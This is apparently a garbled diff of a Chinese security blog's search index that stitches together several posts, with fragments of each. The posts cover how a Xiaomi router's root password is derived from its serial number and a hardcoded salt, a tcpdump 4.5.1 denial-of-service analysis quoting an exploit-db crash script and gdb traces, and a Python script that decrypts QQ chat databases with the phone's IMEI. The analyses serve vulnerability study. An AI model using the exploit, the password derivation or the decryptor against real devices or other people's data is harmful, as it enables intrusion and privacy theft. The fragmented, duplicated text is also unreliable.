这个简单的二进制文件格式<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">48 44 52 30 63 D4 11 03 FE 3D 1A FD 05 00 02 00</span><br><span class="line">20 00 00 00 20 00 FE 00 00 00 00 00 00 00 00 00</span><br><span class="line">FF 04 00 EA 14 F0 9F E5 14 F0 9F E5 14 F0 9F E5</span><br></pre></td></tr></table></figure></p><p>第1～4字节：ASCII字符串“HDR0”，作为固件的标识；<br>第5～8字节：4字节整型数0x0311D464，表示固件的大小：51500132字节；<br>第9~12字节：固件的检查和；<br>第13～14字节：0x0005，表示固件中包含哪些部分；<br>第15～16字节：0x0002，表示固件格式版本号；<br>第17～20字节：0x00000020，表示固件第一部分在整个固件中的偏移量，0.4.85固件的第一部分是brcm4709_nor.bin，也就是Flash中除0xfe0000-0xff0000的board_data外的全镜像；<br>第21～24字节：0x00FE0020，表示固件第二部分在整个固件中的偏移量，0.4.85固件的第二部分是root.ext4.lzma，也就是硬盘中128M固件的压缩包；<br>第33字节开始是固件的正式内容开始。</p><h2 id="小米开启ssh工具包"><a href="#小米开启ssh工具包" class="headerlink" title="小米开启ssh工具包"></a>小米开启ssh工具包</h2><p>使用mkxqimage解包<br>（现在会提示秘钥不存在）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">error fopen public key</span><br><span class="line">Image verify failed, not formal image</span><br></pre></td></tr></table></figure></p><p>如果能解包应该可以得到脚本文件upsetting.sh</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">nvram set ssh_en=1</span><br><span class="line">nvram set flag_init_root_pwd=1</span><br><span class="line">nvram commit</span><br></pre></td></tr></table></figure><p>执行脚本文件upsetting.sh后，将ssh_en设置为1，同时设置了flag_init_root_pwd项。当正式启动时，/usr/sbin/boot_check脚本检测到flag_init_root_pwd=1时，自动修改root用户密码，具体脚本为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">flg_init_pwd=`nvram get flag_init_root_pwd`</span><br><span class="line">if [ &quot;$flg_init_pwd&quot; = &quot;1&quot; ]; then</span><br><span class="line">init_pwd=`mkxqimage -I`</span><br><span class="line">(echo $init_pwd; sleep 1; echo $init_pwd) | passwd root</span><br><span class="line">nvram unset flag_init_root_pwd</span><br><span class="line">nvram commit</span><br><span class="line">fi</span><br></pre></td></tr></table></figure></p><p>初始密码是mkxqimage -I的结果，实际是根据路由器的序列号计算得到。路由器的序列号印在底盖上，12位数字，如：561000088888</p><p>初始密码计算算法为：</p><p><code>substr(md5(SN+&quot;A2E371B0-B34B-48A5-8C40-A7133F3B5D88&quot;), 0, 8)</code></p><p><strong><em>A2E371B0-B34B-48A5-8C40-A7133F3B5D88</em></strong> 为分析mkxqimage得到的salt</p>]]></content>
-      
-      
+<search>
+  <entry>
+    <title><![CDATA[TCPDUMP拒绝服务攻击漏洞]]></title>
+    <url>%2F2019%2F12%2F25%2FTCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E%2F</url>
+    <content type="text"><![CDATA[TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump；它需要WinPcap驱动，相当于在Linux平台下的libpcap. tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。 也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。 二、分析环境 Ubuntu 16.04.4 LTS i686 tcpdump 4.5.1 gdb with peda 三、漏洞复现这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。 1.编译安装tcpdump12345678910111. # apt-get install libpcap-dev2. # dpkg -l libpcap-dev3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz5. # cd tcpdump-4.5.1/6. # ./configure7. # make8. # make install9. # tcpdump –-version tcpdump version 4.5.1 libpcap version 1.7.4 2.生成payload（来自exploit-db payload）12345678910111213141516171819202122232425262728293031323334# Exploit Title: tcpdump 4.5.1 Access Violation Crash# Date: 31st May 2016# Exploit Author: David Silveiro# Vendor Homepage: http://www.tcpdump.org# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz# Version: 4.5.1# Tested on: Ubuntu 14 LTSfrom subprocess import callfrom shlex import splitfrom time import sleepdef crash(): command = &apos;tcpdump -r crash&apos; buffer = &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos; buffer += &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos; buffer += &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos; buffer += &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos; buffer += &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot; buffer += &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot; buffer += &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos; with open(&apos;crash&apos;, &apos;w+b&apos;) as file: file.write(buffer) try: call(split(command)) print(&quot;Exploit successful! &quot;) except: print(&quot;Error: Something has gone wrong!&quot;)def main(): print(&quot;Author: David Silveiro &quot;) print(&quot; tcpdump version 4.5.1 Access Violation Crash &quot;) sleep(2) crash()if __name__ == &quot;__main__&quot;: main() 四、崩溃分析1.pcap包格式首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。123456789struct pcap_file_header &#123; bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */&#125;; 看一下各字段的含义：123456789101112131415161718192021 magic： 4字节 pcap文件标识 目前为“d4 c3 b2 a1” major： 2字节 主版本号 #define PCAP_VERSION_MAJOR 2 minor： 2字节 次版本号 #define PCAP_VERSION_MINOR 4 thiszone：4字节 时区修正 并未使用，目前全为0 sigfigs： 4字节 精确时间戳 并未使用，目前全为0 snaplen： 4字节 抓包最大长度 如果要抓全，设为0x0000ffff（65535）， tcpdump -s 0就是设置这个参数，缺省为68字节 linktype：4字节 链路类型 一般都是1：ethernetstruct pcap_pkthdr &#123; struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */&#125;;struct timeval &#123; long tv_sec; /* seconds (XXX should be time_t) */ suseconds_t tv_usec; /* and microseconds */&#125;; ts： 8字节 抓包时间 4字节表示秒数，4字节表示微秒数 caplen：4字节 保存下来的包长度（最多是snaplen，比如68字节） len： 4字节 数据包的真实长度，如果文件中保存的不是完整数据包，可能比caplen大 其中len变量是值得关注的，因为在crash文件中，对应len变量的值为00 3C 9C 37这是一个很大的值，读取出来就是379C3C00，数非常大，实际上在wireshark中打开这个crash文件，就会报错，会提示这个数据包的长度已经超过了范围，而换算出来的长度就是379C3C00，这是触发漏洞的关键。 2.gdb调试首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置1234567891011121314151617181920212223242526272829303132333435361. Program received signal SIGSEGV, Segmentation fault.2. [----------------------------------registers-----------------------------------]3. EAX: 0x14. EBX: 0x81e33bd --&gt; 0x05. ECX: 0x2e (&apos;.&apos;)6. EDX: 0x07. ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)8. EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)9. EBP: 0x1062110. ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])11. EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1])12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)13. [-------------------------------------code-------------------------------------]14. 0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;: je 0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;15. 0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;: mov ebx,DWORD PTR [esp+0x18]16. 0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;: sub esp,0x417. =&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1]18. 0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;: movzx ecx,BYTE PTR [ebx+ebp*2]19. 0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;: push edx20. 0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;: mov ebx,edx21. 0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;: mov DWORD PTR [esp+0x18],edx22. [------------------------------------stack-------------------------------------]23. 0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])24. 0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c25. 0008| 0xbfffe1b4 --&gt; 0x126. 0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)27. 0016| 0xbfffe1bc --&gt; 0x028. 0020| 0xbfffe1c0 --&gt; 0x029. 0024| 0xbfffe1c4 --&gt; 0x7ffffff930. 0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x031. [------------------------------------------------------------------------------]32. Legend: code, data, rodata, value33. Stopped reason: SIGSEGV34. hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,35. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:9136. 91 s2 = *cp++; 从崩溃信息来看，出错位置为s2 = cp++;崩溃原因为SIGSEGV，即进程执行了一段无效的内存引用或发生段错误。可以看到，问题出现在./print-ascii.c:91，而且此时指针读取[ebx+ebp2+0x1]的内容，可能是越界读取造成的崩溃。再结合源码信息可知，指针cp在自加的过程中访问到了一个没有权限访问的地址，因为这是写在一个while循环里，也就是是说nshorts的值偏大，再看nshorts怎么来的，由此nshorts = length / sizeof(u_short);可知，可能是函数传入的参数length没有控制大小导致，因此目标就是追踪length是如何传入的。我们通过bt回溯一下调用情况。123456789101112131. gdb-peda$ bt2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:914. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:1275. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:1806. #3 0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)7. at ./tcpdump.c:19508. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.89. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.810. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:156911. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,12. fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:29113. #8 0x0804c245 in _start () 函数调用流程1234pcap_loop |----print_packet |-----hex_and_ascii_print |-------- hex_and_ascii_print_with_offset 由此可见，从main函数开始了一连串函数调用，git源码下来看看。tcpdump.c找到pcap_loop调用12345678910111213141516171. do &#123;2. status = pcap_loop(pd, cnt, callback, pcap_userdata);3. if (WFileName == NULL) &#123;4. /*5. * We&apos;re printing packets. Flush the printed output,6. * so it doesn&apos;t get intermingled with error output.7. */8. if (status == -2) &#123;9. /*10. * We got interrupted, so perhaps we didn&apos;t11. * manage to finish a line we were printing.12. * Print an extra newline, just in case.13. */14. putchar(&apos;n&apos;);15. &#125;16. (void)fflush(stdout);17. &#125; 设置断点之后查看一下该函数的执行结果 pcap_loop通过callback指向print_packet,来看一下它的源码1234567891011121314151617181920212223241. static void2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)3. &#123;4. struct print_info *print_info;5. u_int hdrlen;6. ++packets_captured;7. ++infodelay;8. ts_print(&amp;h-&gt;ts);9. print_info = (struct print_info *)user;10. /*11. * Some printers want to check that they&apos;re not walking off the12. * end of the packet.13. * Rather than pass it all the way down, we set this global.14. */15. snapend = sp + h-&gt;caplen;16. if(print_info-&gt;ndo_type) &#123;17. hdrlen = (*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo, h, sp);&lt;====18. &#125; else &#123;19. hdrlen = (*print_info-&gt;p.printer)(h, sp);20. &#125;21. putchar(&apos;n&apos;);22. --infodelay;23. if (infoprint)24. info(0);&#125; 同样设置断点看该函数是如何调用执行的 这是我们可以根据call的信息，计算出调用的函数名 其中(*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo,h,sp)指向ieee802_15_4_if_print 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767725. u_int26. ieee802_15_4_if_print(struct netdissect_options *ndo,27. const struct pcap_pkthdr *h, const u_char *p)28. &#123;29. printf(&quot;address : %x\n&quot;,p);30. u_int caplen = h-&gt;caplen; //传入的caplen，赋值给无符号整形变量caplen,且该值为831. int hdrlen;32. u_int16_t fc;33. u_int8_t seq;34. if (caplen &lt; 3) &#123; //不满足35. ND_PRINT((ndo, &quot;[|802.15.4] %x&quot;, caplen));36. return caplen;37. &#125;38. fc = EXTRACT_LE_16BITS(p);39. hdrlen = extract_header_length(fc);40. seq = EXTRACT_LE_8BITS(p + 2);41. p += 3;42. caplen -= 3;//此时caplen = 543. ND_PRINT((ndo,&quot;IEEE 802.15.4 %s packet &quot;, ftypes[fc &amp; 0x7]));44. if (vflag)45. ND_PRINT((ndo,&quot;seq %02x &quot;, seq));46. if (hdrlen == -1) &#123;47. ND_PRINT((ndo,&quot;malformed! &quot;));48. return caplen;49. &#125;50. if (!vflag) &#123;51. p+= hdrlen;52. caplen -= hdrlen;53. &#125; else &#123;54. u_int16_t panid = 0;55. switch ((fc &gt;&gt; 10) &amp; 0x3) &#123;56. case 0x00:57. ND_PRINT((ndo,&quot;none &quot;));58. break;59. case 0x01:60. ND_PRINT((ndo,&quot;reserved destination addressing mode&quot;));61. return 0;62. case 0x02:63. panid = EXTRACT_LE_16BITS(p);64. p += 2;65. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));66. p += 2;67. break;68. case 0x03:69. panid = EXTRACT_LE_16BITS(p);70. p += 2;71. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p)));72. p += 8;73. break;74. &#125;75. ND_PRINT((ndo,&quot;&lt; &quot;);76. switch ((fc &gt;&gt; 14) &amp; 0x3) &#123;77. case 0x00:78. ND_PRINT((ndo,&quot;none &quot;));79. break;80. case 0x01:81. ND_PRINT((ndo,&quot;reserved source addressing mode&quot;));82. return 0;83. case 0x02:84. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;85. panid = EXTRACT_LE_16BITS(p);86. p += 2;87. &#125;88. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));89. p += 2;90. break;91. case 0x03:92. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;93. panid = EXTRACT_LE_16BITS(p);94. p += 2;95. &#125;96. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p))));97. p += 8;98. break;99. &#125;100. caplen -= hdrlen;101. &#125; 传入的第二个值是struct pcap_pkthdr *h结构体，函数使用的参数caplen就是结构体中的caplen，不难看出，caplen进行一些加减操作后，没有判断正负，直接丢给了下一个函数使用。直接跟进函数，看看最后赋值情况 从源码和调试信息可以看到libpcap在处理不正常包时不严谨，导致包的头长度hdrlen竟然大于捕获包长度caplen，并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数，导致caplen==0xfffffff3过长。继续跟进hex_and_asciii_print(ndo_default_print) 123456789101112131415161718192021222324252627282930311. void2. hex_and_ascii_print(register const char *ident, register const u_char *cp,3. register u_int length)4. &#123;5. hex_and_ascii_print_with_offset(ident, cp, length, 0);6. &#125;其中length==0xfffffff3，继续执行1. void2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,3. register u_int oset)4. &#123;5. register u_int i, s;6. register int nshorts;7.8. nshorts = (u_int) length / sizeof(u_short);9. i = 0;10. while (--nshorts &gt;= 0) &#123;11. if ((i++ % 8) == 0) &#123;12. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);13. oset += HEXDUMP_BYTES_PER_LINE;14. &#125;15. s = *cp++; &lt;======= 抛出错误位置16. (void)printf(&quot; %02x%02x&quot;, s, *cp++);17. &#125;18. if (length &amp; 1) &#123;19. if ((i % 8) == 0)20. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);21. (void)printf(&quot; %02x&quot;, *cp);22. &#125;nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=‭7FFFFFF9‬‬‬‬ 但数据包数据没有这么长，导致了crash。 3.内存分析仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。通过查看epx的值来看一下这个内存到底开辟到什么位置12341. gdb-peda$ x/10000000x 0x81e33bd2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x000000003. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x000000004. 0x8203ffd: Cannot access memory at address 0x8204000 可以看到，到达0x 8204000附近的时候，就是无法读取的无效地址了，那么初始值为0x 81e33bd，用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40，因为ebx+ebp*2+0x1一次读取两个字节，那么循环计数器就要除以2，最后结果为0x 10620。来看一下到达拒绝服务位置读取的长度：EBX: 0x81e33bd –&gt; 0x0；EBP: 0x10621；EBP刚好为10621。正是不可读取内存空间的地址，因此造成拒绝服务。 4.漏洞总结总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。 五、漏洞修补Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本在hex_and_ascii_print_with_offset中增加对caplength的判断1234567891. caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;2. if (length &gt; caplength)3. length = caplength;4. nshorts = length / sizeof(u_short);5. i = 0;6. hsp = hexstuff; asp = asciistuff;7. while (--nshorts &gt;= 0) &#123;8. ...9. &#125; 可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;，caplength为0，继续执行，可以推出length同样为0，到这里已经不会发生错误了。 参考exploit-db payloadWHEREISK0SHL分析博客libpcap/tcpdump源码]]></content>
       <categories>
-          
-          <category> IOT </category>
-          
+        <category>二进制漏洞</category>
       </categories>
-      
-      
-        <tags>
-            
-            <tag> 小米 </tag>
-            
-            <tag> 文件格式 </tag>
-            
-            <tag> SSH </tag>
-            
-        </tags>
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>QQ数据库的加密与解密</title>
-      <link href="/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/"/>
-      <url>/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</url>
-      
-        <content type="html"><![CDATA[<h1 id="qq数据库采用简单加密——异或加密"><a href="#qq数据库采用简单加密——异或加密" class="headerlink" title="qq数据库采用简单加密——异或加密"></a>qq数据库采用简单加密——异或加密</h1><h2 id="数据获取："><a href="#数据获取：" class="headerlink" title="数据获取："></a>数据获取：</h2><p>DENGTA_META.xml—IMEI:867179032952446<br>databases/2685371834.db——数据库文件</p><h2 id="解密方式："><a href="#解密方式：" class="headerlink" title="解密方式："></a>解密方式：</h2><p>明文msg_t   密文msg_Data  key：IMEI<br>msg_t = msg_Data[i]^IMEI[i%15]</p><h2 id="实验："><a href="#实验：" class="headerlink" title="实验："></a>实验：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import sqlite3</span><br><span class="line"></span><br><span class="line">IMEI = &apos;867179032952446&apos;</span><br><span class="line">conn = sqlite3.connect(&apos;2685371834.db&apos;)</span><br><span class="line">c = conn.cursor()</span><br><span class="line"></span><br><span class="line">def _decrypt(foo):</span><br><span class="line">    substr = &apos;&apos;</span><br><span class="line">    #print(len(foo))</span><br><span class="line">    for i in range(0,len(foo)):</span><br><span class="line">        substr += chr(ord(foo[i]) ^ ord(IMEI[i%15]))</span><br><span class="line">    return substr</span><br><span class="line"></span><br><span class="line">#rem = c.execute(&quot;SELECT uin, remark, name FROM Friends&quot;)</span><br><span class="line">Msg = c.execute(&quot;SELECT msgData, senderuin, time FROM mr_friend_0FC9764CD248C8100C82A089152FB98B_New&quot;)</span><br><span class="line"></span><br><span class="line">for msg in Msg:</span><br><span class="line">    uid = _decrypt(msg[1])</span><br><span class="line">    print(&quot;\n&quot;+uid+&quot;:&quot;)</span><br><span class="line">    try:</span><br><span class="line">        msgData = _decrypt(msg[0]).decode(&apos;utf-8&apos;)</span><br><span class="line">        print(msgData)</span><br><span class="line">    except:</span><br><span class="line">        pass</span><br></pre></td></tr></table></figure><h2 id="结果"><a href="#结果" class="headerlink" title="结果"></a>结果</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1552728077/qq.png" alt></p>]]></content>
-      
-      
+      <tags>
+        <tag>TCPDUMP</tag>
+        <tag>拒绝服务攻击</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[小米固件工具mkxqimage]]></title>
+    <url>%2F2019%2F03%2F16%2F%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage%2F</url>
+    <content type="text"><![CDATA[小米固件工具mkxqimage小米自己改了个打包解包固件的工具，基于 trx 改的（本质上还是 trx 格式），加了 RSA 验证和解包功能，路由系统里自带：1234Usage:mkxqimg [-o outfile] [-p private_key] [-f file] [-f file [-f file [-f file ]]] [-x file] [-I] 固件解包固件工具mkxqimage完成对固件的解包，在解包前先检查Checksum是否正确，然后利用RSA公钥/usr/share/xiaoqiang/public.pem检查RSA签名，这两个步骤通过后，根据[0x0C]的固件类型，以及[0x10]、[0x14]、[0x18]和[0x1C]的4个偏移量拆分固件。 固件打包小米官方在打包固件时用RSA私钥计算出固件的RSA签名，小米路由器下载固件后用RSA公钥来验证RSA签名，有效地防止固件被篡改。 固件格式路由固件的格式，基本是基于 openwrt 的 trx 这个简单的二进制文件格式12348 44 52 30 63 D4 11 03 FE 3D 1A FD 05 00 02 0020 00 00 00 20 00 FE 00 00 00 00 00 00 00 00 00FF 04 00 EA 14 F0 9F E5 14 F0 9F E5 14 F0 9F E5 第1～4字节：ASCII字符串“HDR0”，作为固件的标识；第5～8字节：4字节整型数0x0311D464，表示固件的大小：51500132字节；第9~12字节：固件的检查和；第13～14字节：0x0005，表示固件中包含哪些部分；第15～16字节：0x0002，表示固件格式版本号；第17～20字节：0x00000020，表示固件第一部分在整个固件中的偏移量，0.4.85固件的第一部分是brcm4709_nor.bin，也就是Flash中除0xfe0000-0xff0000的board_data外的全镜像；第21～24字节：0x00FE0020，表示固件第二部分在整个固件中的偏移量，0.4.85固件的第二部分是root.ext4.lzma，也就是硬盘中128M固件的压缩包；第33字节开始是固件的正式内容开始。 小米开启ssh工具包使用mkxqimage解包（现在会提示秘钥不存在）12error fopen public keyImage verify failed, not formal image 如果能解包应该可以得到脚本文件upsetting.sh 1234#!/bin/shnvram set ssh_en=1nvram set flag_init_root_pwd=1nvram commit 执行脚本文件upsetting.sh后，将ssh_en设置为1，同时设置了flag_init_root_pwd项。当正式启动时，/usr/sbin/boot_check脚本检测到flag_init_root_pwd=1时，自动修改root用户密码，具体脚本为：1234567flg_init_pwd=`nvram get flag_init_root_pwd`if [ &quot;$flg_init_pwd&quot; = &quot;1&quot; ]; then init_pwd=`mkxqimage -I` (echo $init_pwd; sleep 1; echo $init_pwd) | passwd root nvram unset flag_init_root_pwd nvram commitfi 初始密码是mkxqimage -I的结果，实际是根据路由器的序列号计算得到。路由器的序列号印在底盖上，12位数字，如：561000088888 初始密码计算算法为： substr(md5(SN+&quot;A2E371B0-B34B-48A5-8C40-A7133F3B5D88&quot;), 0, 8) A2E371B0-B34B-48A5-8C40-A7133F3B5D88 为分析mkxqimage得到的salt]]></content>
       <categories>
-          
-          <category> 加密解密 </category>
-          
+        <category>IOT</category>
       </categories>
-      
-      
-        <tags>
-            
-            <tag> 密码 </tag>
-            
-            <tag> QQ </tag>
-            
-            <tag> 数据库 </tag>
-            
-        </tags>
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>wifi半双工侧信道攻击学习笔记</title>
-      <link href="/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"/>
-      <url>/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</url>
-      
-        <content type="html"><![CDATA[<h1 id="TCP侧信道分析及利用的学习报告"><a href="#TCP侧信道分析及利用的学习报告" class="headerlink" title="TCP侧信道分析及利用的学习报告"></a>TCP侧信道分析及利用的学习报告</h1><h2 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h2><h3 id="测信道"><a href="#测信道" class="headerlink" title="测信道"></a>测信道</h3><p><strong>香农信息论</strong></p><p><img src="./1.png" alt="信息熵"></p><p><strong>什么是信息？</strong> 用来减少随机不确定的东西</p><p><strong>什么是加密？</strong> 类似于加噪声，增加随机不确定性</p><blockquote><p>“从密码分析者来看，一个保密系统几乎就是一个通信系统。待传的消息是统计事件，加密所用的密钥按概率选出，加密结果为密报，这是分析者可以利用的，类似于受扰信号。”</p></blockquote><p><strong>侧信道随之出现</strong> 越过加密算法增加的随机不定性，从其他的渠道获取数据标签，确定信息内容。</p><ol><li>早期：采集加密电子设备在运行过程中的时间消耗、功率消耗或者电磁辐射消耗等边缘信息的差异性</li><li>而随着研究的深入，逐渐从加密设备延伸到计算机内部CPU、内存等之间的信息传递</li><li>并在Web应用交互信息传递越来越频繁时，延伸到了网络加密数据流的破解方面</li></ol><p><strong>侧信道攻击的流程</strong> 第一个就是侧信道泄露的截取，第二个是信息的恢复。</p><hr><h3 